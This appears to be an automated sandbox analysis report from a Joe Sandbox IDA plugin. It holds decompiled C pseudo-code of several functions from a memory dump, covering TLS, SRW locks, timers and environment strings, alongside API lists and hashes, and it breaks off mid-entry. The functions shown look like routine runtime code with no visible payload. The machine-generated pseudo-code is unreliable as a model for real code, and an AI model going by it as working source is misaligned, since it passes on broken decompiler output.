0x000b709b
0x000b70a0
0x000b70a3
0x000b70a8
0x000b70a8
0x000b70ab
0x000b70b0
0x000b70b6
0x000b70c6
0x000b71b0
0x000b71b5
0x000b71b8
0x000b71bf
0x000b71c5
0x000b71c7
0x000b71d3
0x000b71d8
0x000b71e3
0x000b71e8
0x000b71e8
0x000b71bf
0x000b70cc
0x000b70d3
0x000b70db
0x000b71a1
0x000b71a1
0x000b70f2
0x000b70f7
0x000b70fb
0x000b7101
0x000b7103
0x000b7119
0x000b711d
0x000b7125
0x000b712b
0x000b713c
0x000b713c
0x000b7145
0x000b7158
0x000b715d
0x000b715f
0x000b716a
0x000b7171
0x000b7173
0x000b7176
0x000b7176
0x000b715d
0x000b7131
0x000b7134
0x000b7116
0x000b7116
0x000b7117
0x00000000
0x00000000
0x000b7117
0x000b7182
0x000b7187
0x00000000

APIs

TlsGetValue.KERNEL32(FFFFFFFF), ref: 000B7059
TryAcquireSRWLockExclusive.KERNEL32(?), ref: 000B70D3
ReleaseSRWLockExclusive.KERNEL32(?), ref: 000B70FB
__Init_thread_header.LIBCMT ref: 000B71B0

Part of subcall function 000C5B30: TlsSetValue.KERNEL32(FFFFFFFF,000B7417,?,000B7417,FFFFFFFF,?), ref: 000C5B39

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExclusiveLockValue$AcquireInit_thread_headerRelease
String ID:
API String ID: 4057198150-0
Opcode ID: ee8b051d11062cfc7980e55859c3a9fc8e84cdb067b90892838408a8f990a7bf
Instruction ID: bf2a0d183207b556a6e0a991f04ac1d0188e66196c091316080bafdcb2a2b2c6
Opcode Fuzzy Hash: ee8b051d11062cfc7980e55859c3a9fc8e84cdb067b90892838408a8f990a7bf
Instruction Fuzzy Hash: 39413B71A04204ABDB24DB6CDC95BEE33A4EF40310F144979E41A57692DB306D85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 000CC1F0 Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E000CC1F0(intOrPtr* _a4) {
				void* _v16;
				signed int _v24;
				signed int _v28;
				union _LARGE_INTEGER _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed int _t49;
				intOrPtr _t56;
				signed int _t74;
				signed int _t79;
				signed int _t80;
				intOrPtr* _t81;
				signed int _t87;

				_t81 = _a4;
				_t42 =  *0x120014; // 0xf049169a
				_v24 = _t42 ^ _t87;
				_v28 = 0;
				_v32.LowPart = 0;
				QueryPerformanceCounter( &_v32);
				_t80 = _v32.LowPart;
				_t61 = _v28;
				asm("sbb eax, ebx");
				if(0x7bd05af6 < _t80) {
					_v48 =  *0x1360c8;
					_v44 =  *0x1360cc;
					_t49 = L000FBF10(_t80, _t61,  *0x1360c8,  *0x1360cc);
					_v68 = _t61;
					_v56 = _t49 * _v64;
					_v52 = _t74 * 0xf4240;
					_t80 = _t80 - _v56;
					_t61 = _v68;
					asm("sbb ebx, esi");
					_v68 = _t49 * 0xf4240;
					_t79 = (_t80 * 0xf4240 >> 0x20) + _v68 * 0xf4240;
					_t56 = L000FBF10(_t80 * 0xf4240, _t79, _v64, _v60) + _v84;
					asm("adc edx, esi");
					_t81 = _a4;
				} else {
					_t79 = _t80 * 0xf4240 >> 0x20;
					_t56 = L000FBF10(_t80 * 0xf4240, _t61 * 0xf4240 + _t79,  *0x1360c8,  *0x1360cc);
				}
				 *_t81 = _t56;
				 *(_t81 + 4) = _t79;
				E000DE643(_t56, _t61, _v24 ^ _t87, _t79, _t80, _t81);
				return _t81;
			}

0x000cc1fc
0x000cc1ff
0x000cc206
0x000cc20a
0x000cc212
0x000cc21f
0x000cc225
0x000cc229
0x000cc239
0x000cc23b
0x000cc26b
0x000cc275
0x000cc27d
0x000cc286
0x000cc290
0x000cc2a3
0x000cc2ac
0x000cc2b0
0x000cc2b4
0x000cc2bd
0x000cc2d1
0x000cc2e2
0x000cc2e6
0x000cc2e8
0x000cc23d
0x000cc244
0x000cc25c
0x000cc25c
0x000cc2eb
0x000cc2ed
0x000cc2f6
0x000cc304

APIs

QueryPerformanceCounter.KERNEL32(00000000), ref: 000CC21F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000CC25C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000CC27D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000CC2DD

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery
String ID:
API String ID: 374826692-0
Opcode ID: b2334886e13734cc4e69df03bf57d22ccd3911e6c8e04acb1a03384475d4500d
Instruction ID: cd9ea2089009ce17c515dc81b0739e9b80294a9002db4c120cd42a2a04e20076
Opcode Fuzzy Hash: b2334886e13734cc4e69df03bf57d22ccd3911e6c8e04acb1a03384475d4500d
Instruction Fuzzy Hash: 38315471604305AFC708DF58DD85A6BFBE9EBC8710F04892EB988D7761D73498489B92

Uniqueness

Uniqueness Score: -1.00%

Function 000B7220 Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E000B7220(void* __ebx, signed int* __ecx, void* __fp0, intOrPtr _a4) {
				signed int _v20;
				signed int _v40;
				char _v2065;
				char _v2068;
				long _v2072;
				long _v2092;
				void* __edi;
				void* __esi;
				long _t54;
				intOrPtr _t55;
				signed int _t58;
				signed int _t60;
				signed int _t61;
				signed char _t63;
				signed int _t64;
				signed int _t71;
				intOrPtr _t72;
				void* _t81;
				signed int _t84;
				signed int _t87;
				intOrPtr _t89;
				signed int _t93;
				signed int _t96;
				void* _t100;
				long _t102;
				signed int _t103;
				intOrPtr _t104;
				void* _t111;
				intOrPtr _t114;
				intOrPtr _t115;
				signed int* _t123;
				long _t124;
				signed int _t126;
				signed int _t130;
				signed int _t132;
				void* _t133;
				void* _t152;

				_t152 = __fp0;
				_t92 = __ebx;
				_push(__ebx);
				_t123 = __ecx;
				_t54 =  *0x123d68; // 0xffffffff
				if(_t54 == 0xffffffff || (TlsGetValue(_t54) & 0x00000003) == 0) {
					L16();
				}
				_t55 =  *0x134adc;
				_t96 =  *0x123e38; // 0x0
				_t110 =  *[fs:0x2c];
				if(_t55 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t96 * 4)) + 4))) {
					_t55 = L000DDC67(_t55, 0x134adc);
					_t132 = _t132 + 4;
					__eflags =  *0x134adc - 0xffffffff;
					if(__eflags == 0) {
						_push(4);
						_t89 = L000DDBBC();
						L000A8CE0(_t89);
						 *0x134ad8 = _t89;
						_t55 = L000DDCDD(0x134adc);
						_t132 = _t132 + 8;
					}
				}
				_t114 =  *0x134ad8;
				__imp__TryAcquireSRWLockExclusive(_t114);
				if(_t55 == 0) {
					L000A8CF0(_t92, _t114, _t110, __eflags, _t152);
				}
				_t100 =  *0x133ed4 + 1;
				_t111 = 0;
				while(1) {
					_t93 = _t100 + _t111 & 0x000000ff;
					_t58 = _t93 + _t93 * 2;
					if( *((intOrPtr*)(0x133ed8 + _t58 * 4)) == 0) {
						break;
					}
					_t111 = _t111 + 1;
					if(_t111 != 0x100) {
						continue;
					} else {
					}
					L10:
					__imp__ReleaseSRWLockExclusive(_t114);
					if( *_t123 >= 0x100) {
						asm("int3");
						asm("ud2");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t130 = _t132;
						_push(_t114);
						_push(_t123);
						_t133 = _t132 - 0x808;
						_t61 =  *0x120014; // 0xf049169a
						_v40 = _t61 ^ _t130;
						_v2092 = 0xffffffff;
						_t102 =  *0x123d68; // 0xffffffff
						_v2092 = _t102;
						__eflags = _t102 - 0xffffffff;
						if(_t102 != 0xffffffff) {
							L24:
							_t63 = TlsGetValue(_t102);
							__eflags = _t63 & 0x00000003;
							if((_t63 & 0x00000003) != 0) {
								asm("int3");
								asm("ud2");
								goto L27;
							} else {
								_t118 =  &_v2068;
								E000E11A0( &_v2068,  &_v2068, 0, 0x800);
								L000C5B30(_v2072,  &_v2065);
								_t126 = L000DDC23();
								L000E0C20(_t77,  &_v2068, 0x800);
								_t81 = L000C5B30(_v2072, _t126 | 0x00000003);
								__eflags = _v20 ^ _t130;
								E000DE643(_t81, _t93, _v20 ^ _t130, _t111, _t118, _t126, 0x800);
								return _t126;
							}
						} else {
							_t123 =  &_v2072;
							_t84 = L000C5B00(_t123);
							_t133 = _t133 + 4;
							__eflags = _t84;
							if(_t84 == 0) {
								L27:
								asm("int3");
								asm("ud2");
								goto L28;
							} else {
								_t102 = _v2072;
								__eflags = _t102 - 0xffffffff;
								if(__eflags != 0) {
									L22:
									asm("lock cmpxchg [0x123d68], ecx");
									if(__eflags != 0) {
										L000C5B20(_t102);
										_t133 = _t133 + 4;
										_t102 =  *0x123d68; // 0xffffffff
										_v2072 = _t102;
									}
									goto L24;
								} else {
									_t87 = L000C5B00(_t123);
									_t133 = _t133 + 4;
									__eflags = _t87;
									if(_t87 == 0) {
										L28:
										asm("int3");
										asm("ud2");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t130);
										_push(_t114);
										_push(_t123);
										_t124 = _t102;
										_t64 =  *0x134adc;
										_t103 =  *0x123e38; // 0x0
										_t112 =  *[fs:0x2c];
										_t104 =  *((intOrPtr*)( *[fs:0x2c] + _t103 * 4));
										__eflags = _t64 -  *((intOrPtr*)(_t104 + 4));
										if(_t64 >  *((intOrPtr*)(_t104 + 4))) {
											_t64 = L000DDC67(_t64, 0x134adc);
											__eflags =  *0x134adc - 0xffffffff;
											if( *0x134adc == 0xffffffff) {
												_push(4);
												_t72 = L000DDBBC();
												L000A8CE0(_t72);
												 *0x134ad8 = _t72;
												_t64 = L000DDCDD(0x134adc);
											}
										}
										_t115 =  *0x134ad8;
										__imp__TryAcquireSRWLockExclusive(_t115);
										__eflags = _t64;
										if(__eflags == 0) {
											L000A8CF0(_t93, _t115, _t112, __eflags, _t152);
										}
										 *((intOrPtr*)(0x133ed8 + ( *_t124 +  *_t124 * 2) * 4)) = 0;
										 *((intOrPtr*)(0x133edc + ( *_t124 +  *_t124 * 2) * 4)) = 0;
										_t71 =  *_t124 +  *_t124 * 2;
										_t51 = 0x133ee0 + _t71 * 4;
										 *_t51 =  *(0x133ee0 + _t71 * 4) + 1;
										__eflags =  *_t51;
										__imp__ReleaseSRWLockExclusive(_t115);
										 *_t124 = 0xffffffff;
										return _t71;
									} else {
										__eflags = _v2072 - 0xffffffff;
										if(__eflags == 0) {
											goto L28;
										} else {
											L000C5B20(0xffffffff);
											_t133 = _t133 + 4;
											_t102 = _v2072;
											goto L22;
										}
									}
								}
							}
						}
					} else {
						return _t58;
					}
				}
				 *((intOrPtr*)(0x133ed8 + _t58 * 4)) = 1;
				_t60 = _t93 * 4;
				 *((intOrPtr*)(_t60 + 0x133edc + _t60 * 2)) = _a4;
				 *0x133ed4 = _t93;
				 *_t123 = _t93;
				_t58 =  *(_t60 + 0x133ee0 + _t60 * 2);
				_t123[1] = _t58;
				goto L10;
			}

0x000b7220
0x000b7220
0x000b7223
0x000b7226
0x000b7228
0x000b7230
0x000b723d
0x000b723d
0x000b7242
0x000b7247
0x000b724d
0x000b725d
0x000b72f2
0x000b72f7
0x000b72fa
0x000b7301
0x000b7307
0x000b7309
0x000b7315
0x000b731a
0x000b7325
0x000b732a
0x000b732a
0x000b7301
0x000b7263
0x000b726a
0x000b7272
0x000b72e6
0x000b72e6
0x000b727a
0x000b727b
0x000b7280
0x000b7283
0x000b7286
0x000b7291
0x00000000
0x00000000
0x000b7293
0x000b729a
0x00000000
0x00000000
0x000b729c
0x000b72ce
0x000b72cf
0x000b72db
0x000b7332
0x000b7333
0x000b7335
0x000b7336
0x000b7337
0x000b7338
0x000b7339
0x000b733a
0x000b733b
0x000b733c
0x000b733d
0x000b733e
0x000b733f
0x000b7341
0x000b7343
0x000b7344
0x000b7345
0x000b734b
0x000b7352
0x000b7355
0x000b735f
0x000b7365
0x000b736b
0x000b736e
0x000b73e4
0x000b73e5
0x000b73eb
0x000b73ed
0x000b7462
0x000b7463
0x00000000
0x000b73ef
0x000b73ef
0x000b73fd
0x000b7412
0x000b7427
0x000b7430
0x000b7444
0x000b744f
0x000b7451
0x000b7461
0x000b7461
0x000b7370
0x000b7370
0x000b7377
0x000b737c
0x000b737f
0x000b7381
0x000b7465
0x000b7465
0x000b7466
0x00000000
0x000b7387
0x000b7387
0x000b738d
0x000b7390
0x000b73c0
0x000b73c5
0x000b73cd
0x000b73d0
0x000b73d5
0x000b73d8
0x000b73de
0x000b73de
0x00000000
0x000b7392
0x000b7393
0x000b7398
0x000b739b
0x000b739d
0x000b7468
0x000b7468
0x000b7469
0x000b746b
0x000b746c
0x000b746d
0x000b746e
0x000b746f
0x000b7470
0x000b7473
0x000b7474
0x000b7475
0x000b7477
0x000b747c
0x000b7482
0x000b7489
0x000b748c
0x000b7492
0x000b74f0
0x000b74f8
0x000b74ff
0x000b7501
0x000b7503
0x000b750f
0x000b7514
0x000b751f
0x000b7524
0x000b74ff
0x000b7494
0x000b749b
0x000b74a1
0x000b74a3
0x000b74e4
0x000b74e4
0x000b74aa
0x000b74ba
0x000b74c7
0x000b74ca
0x000b74ca
0x000b74ca
0x000b74d2
0x000b74d8
0x000b74e1
0x000b73a3
0x000b73a3
0x000b73aa
0x00000000
0x000b73b0
0x000b73b2
0x000b73b7
0x000b73ba
0x00000000
0x000b73ba
0x000b73aa
0x000b739d
0x000b7390
0x000b7381
0x000b72dd
0x000b72e1
0x000b72e1
0x000b72db
0x000b72a5
0x000b72ab
0x000b72b5
0x000b72bc
0x000b72c2
0x000b72c4
0x000b72cb
0x00000000

APIs

TlsGetValue.KERNEL32(FFFFFFFF,001360EC,?,?,?,000B75BC,000CC5A5,001360EC,?,000CC5A5,00000000,?), ref: 000B7233
TryAcquireSRWLockExclusive.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,000A9DF6), ref: 000B726A
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,000A9DF6), ref: 000B72CF
__Init_thread_header.LIBCMT ref: 000B72F2

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExclusiveLock$AcquireInit_thread_headerReleaseValue
String ID:
API String ID: 1978092767-0
Opcode ID: 48ddab7381ff116976f68d4a40d66e17432a216aad0a5077d260437caffc2d87
Instruction ID: 9fbc84e272e53dbab85c8fcc9177b511861ded4c7e9cf683a58980dba05741b8
Opcode Fuzzy Hash: 48ddab7381ff116976f68d4a40d66e17432a216aad0a5077d260437caffc2d87
Instruction Fuzzy Hash: D2210271A082009FC724CF68E884AE973A2FB82320F14402AF55A87BA1DB31AD91CF55

Uniqueness

Uniqueness Score: -1.00%

Function 000FC071 Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E000FC071() {
				intOrPtr _v8;
				signed int _v12;
				WCHAR* _t5;
				void* _t6;
				intOrPtr _t9;
				WCHAR* _t19;
				WCHAR* _t26;
				WCHAR* _t29;

				_push(_t21);
				_t5 = GetEnvironmentStringsW();
				_t29 = _t5;
				if(_t29 != 0) {
					_t6 = E000FC15F(_t29);
					_t19 = 0;
					_v12 = _t6 - _t29 >> 1;
					_t9 = L000FBFBA(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
					_v8 = _t9;
					if(_t9 != 0) {
						_t26 = E000A2990(_t9);
						_push(0);
						if(_t26 != 0) {
							_push(0);
							_push(_v8);
							_push(_t26);
							_push(_v12);
							_push(_t29);
							_push(0);
							_push(0);
							if(L000FBFBA() != 0) {
								L000A29E0(0);
								_t19 = _t26;
							} else {
								L000A29E0(_t26);
							}
							FreeEnvironmentStringsW(_t29);
							_t5 = _t19;
						} else {
							L000A29E0();
							FreeEnvironmentStringsW(_t29);
							_t5 = 0;
						}
					} else {
						FreeEnvironmentStringsW(_t29);
						_t5 = 0;
					}
				}
				return _t5;
			}

0x000fc077
0x000fc079
0x000fc07f
0x000fc083
0x000fc08b
0x000fc090
0x000fc09e
0x000fc0a1
0x000fc0a9
0x000fc0ae
0x000fc0c2
0x000fc0c5
0x000fc0c8
0x000fc0db
0x000fc0dc
0x000fc0df
0x000fc0e0
0x000fc0e3
0x000fc0e4
0x000fc0e5
0x000fc0f0
0x000fc0fb
0x000fc100
0x000fc0f2
0x000fc0f3
0x000fc0f3
0x000fc104
0x000fc10a
0x000fc0ca
0x000fc0ca
0x000fc0d1
0x000fc0d7
0x000fc0d7
0x000fc0b0
0x000fc0b1
0x000fc0b7
0x000fc0b7
0x000fc10d
0x000fc110

APIs

GetEnvironmentStringsW.KERNEL32 ref: 000FC079

Part of subcall function 000FBFBA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,000F5525,?,00000000,-00000008), ref: 000FC066

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000FC0B1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000FC0D1

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 708cc780bb9379cb5f270b14474b19bcc6ba3451b20c2b0d5558cfa9ada278f4
Instruction ID: 240fd41e3e50f75dc884aa94392ea7d0525a2e2b396a92f75a9a14bee10a69b9
Opcode Fuzzy Hash: 708cc780bb9379cb5f270b14474b19bcc6ba3451b20c2b0d5558cfa9ada278f4
Instruction Fuzzy Hash: CB11C8B150521D7F772567B59E8BCFF6AADEF863947100424F601D2902EF20CD41A5B1

Uniqueness

Uniqueness Score: -1.00%

Function 000C02F0 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E000C02F0(void* __eax, intOrPtr* __ecx, void* __edx, void* __fp0) {
				intOrPtr _v20;
				void* __ebx;
				void* _t15;
				void* _t23;
				intOrPtr* _t25;
				intOrPtr* _t26;
				intOrPtr _t39;
				intOrPtr* _t42;

				_t50 = __fp0;
				_t38 = __edx;
				_t15 = __eax;
				_t42 = __ecx;
				 *__ecx = 0x10f228;
				_t39 = __ecx + 0x1c;
				__imp__TryAcquireSRWLockExclusive(_t39, __eax);
				if(__eax == 0) {
					_t15 = L000A8CF0(_t23, _t39, __edx, __eflags, __fp0);
				}
				_t24 =  *((intOrPtr*)(_t42 + 0x20));
				__imp__ReleaseSRWLockExclusive(_t39);
				if( *((intOrPtr*)(_t42 + 0x20)) != 0) {
					_t15 = L000CEF00(_t15, _t24, _t24);
				}
				__imp__TryAcquireSRWLockExclusive(_t39);
				if(_t15 == 0) {
					_t15 = L000A8CF0(_t24, _t39, _t38, __eflags, _t50);
				}
				_t25 =  *((intOrPtr*)(_t42 + 0x20));
				 *((intOrPtr*)(_t42 + 0x20)) = 0;
				_v20 = _t39;
				if(_t25 != 0) {
					 *0x137000();
					_t15 =  *((intOrPtr*)( *((intOrPtr*)( *_t25 + 4))))(1);
					_t39 = _v20;
				}
				 *0x134be4 = 0;
				__imp__ReleaseSRWLockExclusive(_t39);
				_t26 =  *((intOrPtr*)(_t42 + 0x20));
				 *((intOrPtr*)(_t42 + 0x20)) = 0;
				if(_t26 != 0) {
					 *0x137000();
					_t15 =  *((intOrPtr*)( *((intOrPtr*)( *_t26 + 4))))(1);
					_t39 = _v20;
				}
				E00070790(_t15);
				E000A5340(_t42 + 0x14);
				return E000C0690(_t42 + 8, _t38,  *((intOrPtr*)(_t42 + 0xc)));
			}

0x000c02f0
0x000c02f0
0x000c02f0
0x000c02f7
0x000c02f9
0x000c02ff
0x000c0303
0x000c030b
0x000c03b5
0x000c03b5
0x000c0311
0x000c0315
0x000c031d
0x000c0321
0x000c0321
0x000c0327
0x000c032f
0x000c03c1
0x000c03c1
0x000c0335
0x000c0338
0x000c0341
0x000c0344
0x000c034d
0x000c0357
0x000c0359
0x000c0359
0x000c035c
0x000c0367
0x000c036d
0x000c0370
0x000c0379
0x000c0382
0x000c038c
0x000c038e
0x000c038e
0x000c0393
0x000c039b
0x000c03b2

APIs

TryAcquireSRWLockExclusive.KERNEL32(?), ref: 000C0303
ReleaseSRWLockExclusive.KERNEL32(?), ref: 000C0315
TryAcquireSRWLockExclusive.KERNEL32(?), ref: 000C0327
ReleaseSRWLockExclusive.KERNEL32(?), ref: 000C0367

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID:
API String ID: 17069307-0
Opcode ID: 668c9d630c2bb7f938eac83bb255c4e57f81c8ecaa13cbf4a8a0eb131374893a
Instruction ID: 3d20418488ba517e7b1ed65525b0bad7f0a4fa910b064214b2bba5a01c229084
Opcode Fuzzy Hash: 668c9d630c2bb7f938eac83bb255c4e57f81c8ecaa13cbf4a8a0eb131374893a
Instruction Fuzzy Hash: D0219F352043048FD725AF50DDC4BBEB7AABF89714F08441CE94A5B752DB74AC06CB51

Uniqueness

Uniqueness Score: -1.00%

Function 000975B3 Relevance: 6.1, APIs: 4, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E000975B3(void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int* _a12) {
				void* _v16;
				signed int _v24;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t18;
				void* _t23;
				void* _t42;
				signed int _t44;
				signed int _t45;
				void* _t47;

				_t47 = (_t45 & 0xfffffff8) - 0x10;
				_t29 = _a12;
				_t13 =  *0x120014; // 0xf049169a
				_v24 = _t13 ^ _t44;
				asm("adc ecx, edx");
				_t42 = 0;
				_t18 = L000FBF10(0x3b9aca00 *  *_a12 + _a12[2], _t29[1] * 0x3b9aca00 + (0x3b9aca00 *  *_t29 >> 0x20), 0x3e8, 0);
				L00079BB0(0x3e8, _t47);
				_t28 = _t18 -  *((intOrPtr*)(_t47 + 4));
				asm("sbb edi, [eax+0x4]");
				_t23 = L000FBF10(_t18 -  *((intOrPtr*)(_t47 + 4)), 0x3e8, 0x3e8, 0);
				asm("sbb ecx, edi");
				_t24 =  >=  ? 0 : _t23;
				__imp__SleepConditionVariableSRW(_a4, _a8, _t24, 0);
				if(_t24 == 0) {
					_t42 =  !=  ? GetLastError() : 0x8a;
				}
				E000DE643(_t24, _t28, _v40 ^ _t44, 0x3e8, 0x3e8, _t42);
				return _t42;
			}

0x000975bc
0x000975bf
0x000975c2
0x000975c9
0x000975e7
0x000975e9
0x000975f4
0x00097600
0x0009760a
0x0009760c
0x00097618
0x00097629
0x0009762b
0x00097636
0x0009763e
0x00097650
0x00097650
0x00097659
0x00097667

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000975F4

Part of subcall function 00079BB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00079C13

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00097618
SleepConditionVariableSRW.KERNEL32(3B9ACA00,59682F00,00000000,00000000,00000000,?,000003E8,00000000,00000000,0000E941,59682F00,3B9ACA00,00000000), ref: 00097636
GetLastError.KERNEL32 ref: 00097640

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ConditionErrorLastSleepVariable
String ID:
API String ID: 4155066533-0
Opcode ID: 323313b80642b7f808c09f758925bd8f9e33e6cf077079e566fc4ce8ae372bf3
